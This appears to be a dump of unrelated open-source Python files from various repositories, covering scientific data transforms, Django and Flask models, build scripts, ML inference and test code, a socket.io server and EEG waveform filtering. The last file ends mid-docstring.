<reponame>sankhesh/tomviz def transform(dataset): """Reinterpret a signed integral array type as its unsigned counterpart. This can be used when the bytes of a data array have been interpreted as a signed array when it should have been interpreted as an unsigned array.""" import numpy as np scalars = dataset.active_scalars if scalars is None: raise RuntimeError("No scalars found!") dtype = scalars.dtype dtype = dtype.type typeMap = { np.int8: np.uint8, np.int16: np.uint16, np.int32: np.uint32 } typeAddend = { np.int8: 128, np.int16: 32768, np.int32: 2147483648 } if dtype not in typeMap: raise RuntimeError("Scalars are not int8, int16, or int32") newType = typeMap[dtype] addend = typeAddend[dtype] newScalars = scalars.astype(dtype=newType) + addend dataset.active_scalars = newScalars
tg/models.py
horacexd/clist
166
11097172
<reponame>horacexd/clist from django.db import models from pyclist.models import BaseModel from true_coders.models import Coder class Chat(BaseModel): chat_id = models.CharField(max_length=100, blank=True, null=True, unique=True) coder = models.ForeignKey(Coder, on_delete=models.CASCADE) title = models.CharField(max_length=100, blank=True, null=True) name = models.TextField(blank=True, null=True) secret_key = models.CharField(max_length=20, blank=True, null=True) last_command = models.JSONField(default=dict, blank=True) is_group = models.BooleanField(default=False) coders = models.ManyToManyField(Coder, blank=True, related_name='chats') settings = models.JSONField(default=dict, blank=True) def __str__(self): return "%s#%s" % (self.coder_id, self.chat_id) def get_group_name(self): return "%s@%s" % (self.chat_id, self.title) class History(BaseModel): LIMIT_BY_CHAT = 7 chat = models.ForeignKey(Chat, on_delete=models.CASCADE) message = models.JSONField() def __str__(self): return "Histroy %s" % (self.chat) def save(self, *args, **kwargs): q = History.objects.filter(chat=self.chat).order_by('created') count = q.count() if count > self.LIMIT_BY_CHAT: for o in q[0:count - self.LIMIT_BY_CHAT]: o.delete() super(History, self).save(*args, **kwargs) class Meta: verbose_name_plural = 'History' ordering = ['-created']
Silver_Badges/Ayuba_hub_silver_badge/form.py
adeagaoluwaseun/Voting
764
11097177
from flask_wtf import FlaskForm from wtforms.validators import DataRequired,Length class VoterForm(FlaskForm): username = StringField('Username',validators=[DataRequired(),Length(min=2,max=20)]) nin = IntegerField('Country Code', [validators.required()]) submit = SubmitField('Add Voter')
desktop/core/src/desktop/lib/paginator.py
kokosing/hue
5,079
11097179
#!/usr/bin/env python # Licensed to Cloudera, Inc. under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. Cloudera, Inc. licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ Very similar to the Django Paginator class, but easier to work with when you don't have the full object list. """ from django.db.models import query import django.core.paginator class Paginator(django.core.paginator.Paginator): """ Override certain methods of the Django Paginator to allow a partial object list. Does not support orphans. """ def __init__(self, object_list, per_page, total=None, allow_empty_first_page=True): """ Accepts a partial ``object_list``, for the purpose of offset and count calculation. The ``object_list`` is partial if and only if ``total`` is given. In that case, the list is the data for the *next* call to ``page()``. If the ``object_list`` is the full list, ``total`` must be None. """ super(Paginator, self).__init__(object_list, per_page, 0, allow_empty_first_page) if total is None: self.object_list = object_list else: self.object_list = None self._partial_list = object_list # We compute the list length again because it could have changed, # which is solved by evaluating the QuerySet with len(). if isinstance(object_list, query.QuerySet): total = max(total, len(object_list)) # Override parent's private member _count self._count = total def validate_number(self, number): if self.object_list is None: return number return super(Paginator, self).validate_number(number) def page(self, number): if self.object_list is None: # Use a partial list if there is one. # Make sure the length of the list agrees with the Page range. if self._partial_list is not None: res = Page(None, number, self) # Set the object_list later; None for now n_objs = res.end_index() - res.start_index() + 1 res.object_list = self._partial_list[:n_objs] self._partial_list = None # The _partial_list is single-use return res # No data. Just a list of None's return Page((None,) * self.per_page, number, self) # Wrap that parent page in our Page class pg = super(Paginator, self).page(number) # This is a Django Page return Page(pg.object_list, pg.number, pg.paginator) class Page(django.core.paginator.Page): """ Similar to the Django Page, with extra convenient methods. """ def __init__(self, object_list, number, paginator): super(Page, self).__init__(object_list, number, paginator) def num_pages(self): return self.paginator.num_pages def total_count(self): return self.paginator.count def next_page_number(self): if self.has_next(): return self.number + 1 return self.number def previous_page_number(self): if self.has_previous(): return self.number - 1 return self.number
qt__pyqt__pyside__pyqode/pyqt5__QTreeView_QFileSystemModel.py
DazEB2/SimplePyScripts
117
11097205
<reponame>DazEB2/SimplePyScripts<gh_stars>100-1000 #!/usr/bin/env python3 # -*- coding: utf-8 -*- __author__ = 'ipetrash' from PyQt5.QtWidgets import QTreeView, QFileSystemModel, QApplication from PyQt5.QtCore import QDir if __name__ == '__main__': app = QApplication([]) model = QFileSystemModel() model.setRootPath(QDir.currentPath()) model.setReadOnly(False) mw = QTreeView() mw.setModel(model) mw.setRootIndex(model.index(QDir.currentPath())) mw.show() app.exec()
augly/video/augmenters/ffmpeg/overlay.py
iAdityaEmpire/AugLy
4,610
11097229
<reponame>iAdityaEmpire/AugLy #!/usr/bin/env python3 # Copyright (c) Meta Platforms, Inc. and affiliates. # All rights reserved. # # This source code is licensed under the license found in the # LICENSE file in the root directory of this source tree. from typing import List from augly.utils import is_image_file, is_video_file, pathmgr from augly.video.augmenters.ffmpeg.base_augmenter import BaseVidgearFFMPEGAugmenter from augly.video.helpers import get_video_info class VideoAugmenterByOverlay(BaseVidgearFFMPEGAugmenter): def __init__( self, overlay_path: str, x_factor: float, y_factor: float, use_overlay_audio: bool, ): assert is_image_file(overlay_path) or is_video_file( overlay_path ), "Overlaid media type not supported: please overlay either an image or video" assert 0 <= x_factor <= 1, "x_factor must be a value in the range [0, 1]" assert 0 <= y_factor <= 1, "y_factor must be a value in the range [0, 1]" assert ( type(use_overlay_audio) == bool ), "Expected a boolean value for use_overlay_audio" self.overlay_path = pathmgr.get_local_path(overlay_path) self.x_factor = x_factor self.y_factor = y_factor self.use_overlay_audio = use_overlay_audio and is_video_file(overlay_path) def get_command(self, video_path: str, output_path: str) -> List[str]: """ Overlays media onto the video @param video_path: the path to the video to be augmented @param output_path: the path in which the resulting video will be stored. @returns: a list of strings containing the CLI FFMPEG command for the augmentation """ video_info = get_video_info(video_path) new_width = video_info["width"] * self.x_factor new_height = video_info["height"] * self.y_factor return [ *self.input_fmt(video_path), "-i", self.overlay_path, "-filter_complex", f"[0:v][1:v] overlay={new_width}:{new_height}", "-map", f"{int(self.use_overlay_audio)}:a:0", *self.output_fmt(output_path), ]
ros/create_dockerfiles.py
christophebedard/docker_images-1
328
11097232
<filename>ros/create_dockerfiles.py<gh_stars>100-1000 #!/usr/bin/env python3 import os import sys import yaml try: from cStringIO import StringIO except ImportError: from io import StringIO from em import Interpreter from docker_templates.argparse import DockerfileArgParser from docker_templates.create import create_files from docker_templates.collections import OrderedLoad from docker_templates.packages import expandPackages def main(argv=sys.argv[1:]): """Create Dockerfiles for images from platform and image yaml data""" # Create the top-level parser parser = DockerfileArgParser( description="Generate the 'Dockerfile's for the base docker images") parser.set() args = parser.parse(argv) # Read platform params with open(args.platform, 'r') as f: # use safe_load instead load platform = yaml.safe_load(f)['platform'] # Read image params using platform params images_yaml = StringIO() try: interpreter = Interpreter(output=images_yaml) interpreter.file(open(args.images, 'r'), locals=platform) images_yaml = images_yaml.getvalue() except Exception as e: print("Error processing %s" % args.images) raise finally: interpreter.shutdown() interpreter = None # Use ordered dict images = OrderedLoad(images_yaml, yaml.SafeLoader)['images'] # For each image tag for image in images: # Get data for image data = dict(images[image]) data['tag_name'] = image # Add platform params data.update(platform) # Apply package distro/version formatting expandPackages(data) # Get path to save Docker file dockerfile_dir = os.path.join(args.output, image) if not os.path.exists(dockerfile_dir): os.makedirs(dockerfile_dir) data['dockerfile_dir'] = dockerfile_dir # generate Dockerfile create_files(data) if __name__ == '__main__': main()
build/android/gyp/proguard.py
zipated/src
2,151
11097266
#!/usr/bin/env python # # Copyright 2013 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. import optparse import os import sys from util import build_utils from util import proguard_util _DANGEROUS_OPTIMIZATIONS = [ # See crbug.com/825995 (can cause VerifyErrors) "class/merging/vertical", "class/unboxing/enum", # See crbug.com/625992 "code/allocation/variable", # See crbug.com/625994 "field/propagation/value", "method/propagation/parameter", "method/propagation/returnvalue", ] def _ParseOptions(args): parser = optparse.OptionParser() build_utils.AddDepfileOption(parser) parser.add_option('--proguard-path', help='Path to the proguard executable.') parser.add_option('--input-paths', help='Paths to the .jar files proguard should run on.') parser.add_option('--output-path', help='Path to the generated .jar file.') parser.add_option('--proguard-configs', action='append', help='Paths to proguard configuration files.') parser.add_option('--proguard-config-exclusions', default='', help='GN list of paths to proguard configuration files ' 'included by --proguard-configs, but that should ' 'not actually be included.') parser.add_option('--mapping', help='Path to proguard mapping to apply.') parser.add_option('--is-test', action='store_true', help='If true, extra proguard options for instrumentation tests will be ' 'added.') parser.add_option('--classpath', action='append', help='Classpath for proguard.') parser.add_option('--stamp', help='Path to touch on success.') parser.add_option('--enable-dangerous-optimizations', action='store_true', help='Enable optimizations which are known to have issues.') parser.add_option('--verbose', '-v', action='store_true', help='Print all proguard output') options, _ = parser.parse_args(args) classpath = [] for arg in options.classpath: classpath += build_utils.ParseGnList(arg) options.classpath = classpath configs = [] for arg in options.proguard_configs: configs += build_utils.ParseGnList(arg) options.proguard_configs = configs options.proguard_config_exclusions = ( build_utils.ParseGnList(options.proguard_config_exclusions)) options.input_paths = build_utils.ParseGnList(options.input_paths) return options def main(args): args = build_utils.ExpandFileArgs(args) options = _ParseOptions(args) proguard = proguard_util.ProguardCmdBuilder(options.proguard_path) proguard.injars(options.input_paths) proguard.configs(options.proguard_configs) proguard.config_exclusions(options.proguard_config_exclusions) proguard.outjar(options.output_path) if options.mapping: proguard.mapping(options.mapping) classpath = list(set(options.classpath)) proguard.libraryjars(classpath) proguard.verbose(options.verbose) if not options.enable_dangerous_optimizations: proguard.disable_optimizations(_DANGEROUS_OPTIMIZATIONS) build_utils.CallAndWriteDepfileIfStale( proguard.CheckOutput, options, input_paths=proguard.GetInputs(), input_strings=proguard.build(), output_paths=proguard.GetOutputs(), depfile_deps=proguard.GetDepfileDeps()) if __name__ == '__main__': sys.exit(main(sys.argv[1:]))
rnn_translator/pytorch/seq2seq/inference/inference.py
omshri22121999/training
567
11097270
import contextlib import logging import os import subprocess import time import torch import torch.distributed as dist import seq2seq.data.config as config from seq2seq.inference.beam_search import SequenceGenerator from seq2seq.utils import AverageMeter from seq2seq.utils import barrier from seq2seq.utils import get_rank from seq2seq.utils import get_world_size def gather_predictions(preds): world_size = get_world_size() if world_size > 1: all_preds = [preds.new(preds.size(0), preds.size(1)) for i in range(world_size)] dist.all_gather(all_preds, preds) preds = torch.cat(all_preds) return preds class Translator: """ Translator runs validation on test dataset, executes inference, optionally computes BLEU score using sacrebleu. """ def __init__(self, model, tokenizer, loader, beam_size=5, len_norm_factor=0.6, len_norm_const=5.0, cov_penalty_factor=0.1, max_seq_len=50, cuda=False, print_freq=1, dataset_dir=None, save_path=None, target_bleu=None): self.model = model self.tokenizer = tokenizer self.loader = loader self.insert_target_start = [config.BOS] self.insert_src_start = [config.BOS] self.insert_src_end = [config.EOS] self.batch_first = model.batch_first self.cuda = cuda self.beam_size = beam_size self.print_freq = print_freq self.dataset_dir = dataset_dir self.target_bleu = target_bleu self.save_path = save_path self.distributed = (get_world_size() > 1) self.generator = SequenceGenerator( model=self.model, beam_size=beam_size, max_seq_len=max_seq_len, cuda=cuda, len_norm_factor=len_norm_factor, len_norm_const=len_norm_const, cov_penalty_factor=cov_penalty_factor) def build_eval_path(self, epoch, iteration): """ Appends index of the current epoch and index of the current iteration to the name of the file with results. :param epoch: index of the current epoch :param iteration: index of the current iteration """ if iteration is not None: eval_fname = f'eval_epoch_{epoch}_iter_{iteration}' else: eval_fname = f'eval_epoch_{epoch}' eval_path = os.path.join(self.save_path, eval_fname) return eval_path def run(self, calc_bleu=True, epoch=None, iteration=None, eval_path=None, summary=False, reference_path=None): """ Runs translation on test dataset. :param calc_bleu: if True compares results with reference and computes BLEU score :param epoch: index of the current epoch :param iteration: index of the current iteration :param eval_path: path to the file for saving results :param summary: if True prints summary :param reference_path: path to the file with reference translation """ if self.cuda: test_bleu = torch.cuda.FloatTensor([0]) break_training = torch.cuda.LongTensor([0]) else: test_bleu = torch.FloatTensor([0]) break_training = torch.LongTensor([0]) if eval_path is None: eval_path = self.build_eval_path(epoch, iteration) detok_eval_path = eval_path + '.detok' with contextlib.suppress(FileNotFoundError): os.remove(eval_path) os.remove(detok_eval_path) rank = get_rank() logging.info(f'Running evaluation on test set') self.model.eval() torch.cuda.empty_cache() output = self.evaluate(epoch, iteration, summary) output = output[:len(self.loader.dataset)] output = self.loader.dataset.unsort(output) if rank == 0: with open(eval_path, 'a') as eval_file: eval_file.writelines(output) if calc_bleu: self.run_detokenizer(eval_path) test_bleu[0] = self.run_sacrebleu(detok_eval_path, reference_path) if summary: logging.info(f'BLEU on test dataset: {test_bleu[0]:.2f}') if self.target_bleu and test_bleu[0] >= self.target_bleu: logging.info(f'Target accuracy reached') break_training[0] = 1 barrier() torch.cuda.empty_cache() logging.info(f'Finished evaluation on test set') if self.distributed: dist.broadcast(break_training, 0) dist.broadcast(test_bleu, 0) return test_bleu[0].item(), break_training[0].item() def evaluate(self, epoch, iteration, summary): """ Runs evaluation on test dataset. :param epoch: index of the current epoch :param iteration: index of the current iteration :param summary: if True prints summary """ batch_time = AverageMeter(False) tot_tok_per_sec = AverageMeter(False) iterations = AverageMeter(False) enc_seq_len = AverageMeter(False) dec_seq_len = AverageMeter(False) stats = {} output = [] for i, (src, indices) in enumerate(self.loader): translate_timer = time.time() src, src_length = src batch_size = self.loader.batch_size global_batch_size = batch_size * get_world_size() beam_size = self.beam_size bos = [self.insert_target_start] * (batch_size * beam_size) bos = torch.LongTensor(bos) if self.batch_first: bos = bos.view(-1, 1) else: bos = bos.view(1, -1) src_length = torch.LongTensor(src_length) stats['total_enc_len'] = int(src_length.sum()) if self.cuda: src = src.cuda() src_length = src_length.cuda() bos = bos.cuda() with torch.no_grad(): context = self.model.encode(src, src_length) context = [context, src_length, None] if beam_size == 1: generator = self.generator.greedy_search else: generator = self.generator.beam_search preds, lengths, counter = generator(batch_size, bos, context) stats['total_dec_len'] = lengths.sum().item() stats['iters'] = counter indices = torch.tensor(indices).to(preds) preds = preds.scatter(0, indices.unsqueeze(1).expand_as(preds), preds) preds = gather_predictions(preds).cpu() for pred in preds: pred = pred.tolist() detok = self.tokenizer.detokenize(pred) output.append(detok + '\n') elapsed = time.time() - translate_timer batch_time.update(elapsed, batch_size) total_tokens = stats['total_dec_len'] + stats['total_enc_len'] ttps = total_tokens / elapsed tot_tok_per_sec.update(ttps, batch_size) iterations.update(stats['iters']) enc_seq_len.update(stats['total_enc_len'] / batch_size, batch_size) dec_seq_len.update(stats['total_dec_len'] / batch_size, batch_size) if i % self.print_freq == 0: log = [] log += f'TEST ' if epoch is not None: log += f'[{epoch}]' if iteration is not None: log += f'[{iteration}]' log += f'[{i}/{len(self.loader)}]\t' log += f'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t' log += f'Decoder iters {iterations.val:.1f} ({iterations.avg:.1f})\t' log += f'Tok/s {tot_tok_per_sec.val:.0f} ({tot_tok_per_sec.avg:.0f})' log = ''.join(log) logging.info(log) tot_tok_per_sec.reduce('sum') enc_seq_len.reduce('mean') dec_seq_len.reduce('mean') batch_time.reduce('mean') iterations.reduce('sum') if summary and get_rank() == 0: time_per_sentence = (batch_time.avg / global_batch_size) log = [] log += f'TEST SUMMARY:\n' log += f'Lines translated: {len(self.loader.dataset)}\t' log += f'Avg total tokens/s: {tot_tok_per_sec.avg:.0f}\n' log += f'Avg time per batch: {batch_time.avg:.3f} s\t' log += f'Avg time per sentence: {1000*time_per_sentence:.3f} ms\n' log += f'Avg encoder seq len: {enc_seq_len.avg:.2f}\t' log += f'Avg decoder seq len: {dec_seq_len.avg:.2f}\t' log += f'Total decoder iterations: {int(iterations.sum)}' log = ''.join(log) logging.info(log) return output def run_detokenizer(self, eval_path): """ Executes moses detokenizer on eval_path file and saves result to eval_path + ".detok" file. :param eval_path: path to the tokenized input """ logging.info('Running detokenizer') detok_path = os.path.join(self.dataset_dir, config.DETOKENIZER) detok_eval_path = eval_path + '.detok' with open(detok_eval_path, 'w') as detok_eval_file, \ open(eval_path, 'r') as eval_file: subprocess.run(['perl', f'{detok_path}'], stdin=eval_file, stdout=detok_eval_file, stderr=subprocess.DEVNULL) def run_sacrebleu(self, detok_eval_path, reference_path): """ Executes sacrebleu and returns BLEU score. :param detok_eval_path: path to the test file :param reference_path: path to the reference file """ if reference_path is None: reference_path = os.path.join(self.dataset_dir, config.TGT_TEST_TARGET_FNAME) sacrebleu_params = '--score-only -lc --tokenize intl' logging.info(f'Running sacrebleu (parameters: {sacrebleu_params})') sacrebleu = subprocess.run([f'sacrebleu --input {detok_eval_path} \ {reference_path} {sacrebleu_params}'], stdout=subprocess.PIPE, shell=True) test_bleu = float(sacrebleu.stdout.strip()) return test_bleu
servers/docker-python/nohandler/server_app.py
veaba/ncov
288
11097276
import json import socketio from aiohttp import web # from socket_app import socket_app from mongo import update_news, query_list sio = socketio.AsyncServer(cors_allowed_origins='*') app = web.Application() sio.attach(app) async def index(request): return web.Response(text="Hello Python socket.io", content_type="text/html") # 连接消息 @sio.event def connect(sid, environ): pass # print('connect_sid', sid) # print('connect_environ', environ) # 全局性 # @sio.on('message') # async def print_message(sid, message): # # When we receive a new event of type # # 'message' through a socket.io connection # # we print the socket ID and the message # print("Socket ID: ", sid) # print(111, message) @sio.on('hello') async def print_hello(sid, message): print(222, message) # time.sleep(2) # await sio.emit('my_message', {'response': '哈哈收到了'}) # 这样可以,怎么可以主动发送呢 # todo broadcast 广播消息 @sio.event async def emit_broadcast(): data = "服务发来的消息" print('消息被执行') await sio.emit('broadcast', {'xxx': data}) @sio.event async def my_broadcast_event(sid, message): print(3333, sid, message) # await sio.emit('my_response', {'data': message['data']}) # todo 微博消息 # We bind our aiohttp endpoint to our app # router # 断开连接 @sio.event def disconnect(sid): pass # print('disconnect: ', sid) async def background_task(): while True: # 每一分钟读取数据库,前20条,并打标记,过滤打非标记,再入库 await sio.sleep(5) news_list = query_list('broadcast') # 广播的数据 broadcast_list = [item for item in json.loads(news_list) if 'is_read' not in item] await sio.emit('my_response', {'code': 0, 'data': broadcast_list}) for item in broadcast_list: print(item) # item['_id'] = item['_id']['$oid'] del item['_id'] item['is_read'] = 1 print('1111=>',item) update_news(item, 'broadcast') app.router.add_get('/', index) async def xx(): while True: await sio.sleep(2) await sio.emit('my_response', {'x': 44}) def server_app(application): sio.start_background_task(background_task) web.run_app(application) # We kick off our server if __name__ == '__main__': server_app(app)
h2o-py/tests/testdir_algos/glm/pyunit_glm_regularization_path.py
ahmedengu/h2o-3
6,098
11097296
import sys sys.path.insert(1,"../../../") import h2o from builtins import range from tests import pyunit_utils from h2o.estimators.glm import H2OGeneralizedLinearEstimator as glm def reg_path_glm(): # read in the dataset and construct training set (and validation set) d = h2o.import_file(path=pyunit_utils.locate("smalldata/logreg/prostate.csv")) m = glm(family='binomial',lambda_search=True,solver='COORDINATE_DESCENT') m.train(training_frame=d,x=[2,3,4,5,6,7,8],y=1) r = glm.getGLMRegularizationPath(m) m2 = glm.makeGLMModel(model=m,coefs=r['coefficients'][10]) dev1 = r['explained_deviance_train'][10] p = m2.model_performance(d) dev2 = 1-p.residual_deviance()/p.null_deviance() print(dev1," =?= ",dev2) assert abs(dev1 - dev2) < 1e-6 for l in range(0,len(r['lambdas'])): m = glm(family='binomial',lambda_search=False,Lambda=r['lambdas'][l],solver='COORDINATE_DESCENT') m.train(training_frame=d,x=[2,3,4,5,6,7,8],y=1) cs = r['coefficients'][l] cs_norm = r['coefficients_std'][l] diff = 0 diff2 = 0 for n in cs.keys(): diff = max(diff,abs((cs[n] - m.coef()[n]))) diff2 = max(diff2,abs((cs_norm[n] - m.coef_norm()[n]))) print(diff) print(diff2) assert diff < 1e-2 assert diff2 < 1e-2 p = m.model_performance(d) devm = 1-p.residual_deviance()/p.null_deviance() devn = r['explained_deviance_train'][l] print(devm) print(devn) assert abs(devm - devn) < 1e-4 if __name__ == "__main__": pyunit_utils.standalone_test(reg_path_glm) else: reg_path_glm()
learning_python/modules/collateral/module_basics/use_module2b.py
fallenfuzz/pynet
528
11097349
from my_module2 import dns_ip dns_ip() dns_ip(dns="1.1.1.1")
tools/SDKTool/src/ui/tree/ai_tree/action_rain_bow_data.py
Passer-D/GameAISDK
1,210
11097352
# -*- coding: utf-8 -*- """ Tencent is pleased to support the open source community by making GameAISDK available. This source code file is licensed under the GNU General Public License Version 3. For full details, please refer to the file "LICENSE.txt" which is provided as part of this source code package. Copyright (C) 2020 THL A29 Limited, a Tencent company. All rights reserved. """ import logging from .action_dqn_data import DqnActionData from ....config_manager.ai.ai_manager import AIManager, AIAlgorithmType logger = logging.getLogger("sdktool") class RainBowActionData(DqnActionData): def __init__(self): ai_mgr = AIManager() self.__game_action = ai_mgr.get_game_action(3) self.__ai_action = ai_mgr.get_ai_action(3) @staticmethod def get_game_action_inner(): return AIManager().get_game_action(AIAlgorithmType.RAINBOW) @staticmethod def get_ai_action_inner(): return AIManager().get_ai_action(AIAlgorithmType.RAINBOW)
eeg_modelling/eeg_viewer/waveform_data_service.py
deepneuralmachine/google-research
23,901
11097362
# coding=utf-8 # Copyright 2021 The Google Research Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Contains methods for packaging data from a DataSource for the API.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function from absl import logging import numpy as np from scipy import signal from eeg_modelling.eeg_viewer import utils from eeg_modelling.pyprotos import data_pb2 # The double banana refers to a common montage used to display EEG data. # Each tuple represents a 'standard' in the montage, which is a subtraction of # the signals from two EEG leads placed on the scalp. # Elements containing '|' allow for differences in lead naming conventions # between datasets. _DOUBLE_BANANA = [('FP1', 'F7'), ('F7', 'T3|T7'), ('T3|T7', 'T5|P7'), ('T5|P7', 'O1'), ('FP2', 'F8'), ('F8', 'T4|T8'), ('T4|T8', 'T6|P8'), ('T6|P8', 'O2'), ('FP1', 'F3'), ('F3', 'C3'), ('C3', 'P3'), ('P3', 'O1'), ('FP2', 'F4'), ('F4', 'C4'), ('C4', 'P4'), ('P4', 'O2'), ('FZ', 'CZ'), ('CZ', 'PZ'), ('EKG1', 'EKG2')] # The standard set of leads for a 12 lead ECG _ECG_12_LEAD = [('I',), ('II',), ('III',), ('AVR',), ('AVL',), ('AVF',), ('V1',), ('V2',), ('V3',), ('V4',), ('V5',), ('V6',)] def _FilterData(row_data, index, data_source, low_cut, high_cut, notch): """Runs full segment data through low and high pass filters. Args: row_data: Full segment data for a single channel. index: The index for a single channel. data_source: The DataSource for the waveform data. low_cut: lower frequency to apply a band-pass filter. high_cut: higher frequency to apply a band-pass filter. notch: frequency to apply a notch filter. Returns: Filtered input row data. """ nyquist_freq = data_source.GetChannelSamplingFrequency(index) / 2 low_val = low_cut / nyquist_freq high_val = high_cut / nyquist_freq notch_val = notch / nyquist_freq pad_len = int(nyquist_freq) if int(nyquist_freq) else 1 padded_data = np.pad(row_data, (pad_len, pad_len), 'symmetric') if low_val > 0 and low_val < 1: # Using a 1st-order forward pass filter to match NK viewer b, a = signal.butter(1, [low_val], btype='high', analog=False) padded_data = signal.lfilter(b, a, padded_data) if high_val > 0 and high_val < 1: # Using a 1st-order forward pass filter to match NK viewer b, a = signal.butter(1, [high_val], btype='low', analog=False) padded_data = signal.lfilter(b, a, padded_data) if notch_val > 0 and notch_val < 1: b, a = signal.iirnotch(notch_val, 30) padded_data = signal.lfilter(b, a, padded_data) return padded_data[pad_len:-pad_len] def _GetChannelIndicesInChannelDataIdList(id_list): """Returns a list of all the unique channel indices requested.""" channel_indices = [] for ch in id_list: if ch.HasField('bipolar_channel'): request_indices = [ ch.bipolar_channel.index, ch.bipolar_channel.referential_index ] else: request_indices = [ch.single_channel.index] channel_indices = channel_indices + request_indices return list(set(channel_indices)) def _CreateChannelData(data_source, channel_data_ids, low_cut, high_cut, notch, start=0, duration=None, max_samples=None): """Returns a list of channel names and a dictionary of their values. Args: data_source: The DataSource for the waveform data. channel_data_ids: ChannelDataIds list. low_cut: lower frequency to apply a band-pass filter. high_cut: higher frequency to apply a band-pass filter. notch: frequency to apply a notch filter. start: start time to crop the data, relative to the start of the file (in seconds). Defaults to the start of the file. duration: duration to crop from the data, in seconds. If None, will get the whole file data. max_samples: The maximum number of samples in one channel response. If None, there is no maximum limit. Returns: A dictionary of channel names mapped to the requested time slice of their data and an ordered list of the channel names. Raises: ValueError: Too many feature keys provided (only handles raw features or subtraction of two features). """ if duration is None: duration = data_source.GetLength() channel_indices = _GetChannelIndicesInChannelDataIdList(channel_data_ids) single_channel_data = data_source.GetChannelData( channel_indices, start, duration) subsampling = 1 if max_samples is None else utils.GetSubsamplingRate( len(list(single_channel_data.values())[0]), max_samples) def _GetFilteredData(index): """Wrapper to call _FilterData function. Args: index: the index for the selected channel. Returns: Filtered data for the selected channel. """ return _FilterData(single_channel_data[str(index)], index, data_source, low_cut, high_cut, notch) req_channel_data = {} channel_names = [] for channel_data_id in channel_data_ids: if channel_data_id.HasField('bipolar_channel'): primary_index = channel_data_id.bipolar_channel.index primary_data = _GetFilteredData(primary_index) ref_index = channel_data_id.bipolar_channel.referential_index ref_data = _GetFilteredData(ref_index) channel_data = [reference - primary for (primary, reference) in zip(primary_data, ref_data)] channel_name = '-'.join(data_source.GetChannelName(index) for index in [primary_index, ref_index]) elif channel_data_id.HasField('single_channel'): index = channel_data_id.single_channel.index channel_data = _GetFilteredData(index) channel_name = data_source.GetChannelName(index) else: raise ValueError('Unfamiliary channel type %s' % channel_data_id) req_channel_data[channel_name] = channel_data[::subsampling] channel_names.append(channel_name) return req_channel_data, channel_names def _AddDataTableSeries(channel_data, output_data): """Adds series to the DataTable inputs. Args: channel_data: A dictionary of channel names to their data. Each value in the dictionary has the same sampling frequency and the same time slice. output_data: Current graph data for DataTable API. Returns: The edited output_data dictionary where the first index represents the time axis value and the second the series value. """ for i in range(len(list(channel_data.values())[0])): output_data[i].update({channel_name: data[i] for channel_name, data in channel_data.items()}) return output_data def GetSamplingFrequency(data_source, channel_data_ids): """Returns the sampling frequency for a group of channels. Args: data_source: DataSource instance. channel_data_ids: Channels to get the sampling freq from. Returns: Sampling frequency for all the channels (must be the same). """ channel_indices = _GetChannelIndicesInChannelDataIdList(channel_data_ids) return data_source.GetSamplingFrequency(channel_indices) def _CreateChunkDataTableJSon(data_source, request, max_samples): """Creates a DataTable in JSON format which contains the data specified. Data can be specified by a list of minuends and subtrahends of montage standards and/or a list of channel keys. Args: data_source: The DataSource for the waveform data. request: A DataRequest proto instance. max_samples: The maximum number of samples in one channel response. Returns: JSON format DataTable loaded with montage data. Raises: ValueError: The requested channels have multiple frequency types. """ sample_freq = GetSamplingFrequency(data_source, request.channel_data_ids) # Initialize Dygraph data with a time axis of sampling frequency. output_data, _ = utils.InitDataTableInputsWithTimeAxis( sample_freq, request.chunk_duration_secs, request.chunk_start, max_samples) columns_order = ['seconds'] channel_data, channel_names = _CreateChannelData( data_source, request.channel_data_ids, request.low_cut, request.high_cut, request.notch, start=request.chunk_start, duration=request.chunk_duration_secs, max_samples=max_samples) output_data = _AddDataTableSeries(channel_data, output_data) columns_order.extend(channel_names) return (utils.ConvertToDataTableJSon(output_data, columns_order), sample_freq) def GetMetadata(data_source, max_samples): """Returns metadata consistent across the predictions. Args: data_source: The DataSource for the waveform data. max_samples: The maximum number of samples in one channel response. Returns: A PredictionMetadata instance filled with PredictionOutput data. """ response = data_pb2.WaveformMetadata() response.abs_start = data_source.GetStartTime() response.labels.extend(data_source.GetAnnotations()) for index, channel in data_source.GetChannelIndexDict().iteritems(): response.channel_dict[index] = channel response.file_type = data_source.GetFileType() response.nav_timeline_datatable = utils.CreateEmptyTable( data_source.GetLength(), max_samples) response.num_secs = data_source.GetLength() response.patient_id = data_source.GetPatientId() response.sstable_key = data_source.GetFileKey() return response def _GetChannelIndexFromNameOptions(channel_opts, data_source): indices = [data_source.GetChannelIndexFromName(opt) for opt in channel_opts.split('|') if data_source.GetChannelIndexFromName(opt)] return indices[0] if indices else None def _GetChannelDataIdFromNameOptions(channel_name, data_source): """Creates a ChannelDataId for a channel name string with name options. Sometimes channel naming conventions for the same electrode placement vary between institutions, so the options allow us to cover all cases. Args: channel_name: A tuple of strings with channel name options joined on '|'. data_source: The DataSource for the waveform data. Returns: A ChannelDataId filled out with the indices for the given name tuple. """ channel_id = None if len(channel_name) == 2: primary_index = _GetChannelIndexFromNameOptions(channel_name[0], data_source) ref_index = _GetChannelIndexFromNameOptions(channel_name[1], data_source) if primary_index is not None and ref_index is not None: channel_id = data_pb2.ChannelDataId() channel_id.bipolar_channel.index = int(primary_index) channel_id.bipolar_channel.referential_index = int(ref_index) if len(channel_name) == 1: index = _GetChannelIndexFromNameOptions(channel_name[0], data_source) if index is not None: channel_id = data_pb2.ChannelDataId() channel_id.single_channel.index = int(index) return channel_id def _GetDefaultChannelDataIdList(data_source): """Returns the list of default features when a request does not specify. When a data request is made for the first time with a set of file parameters, the client does not have the lookup table with the channel indices, therefore the client cannot specify 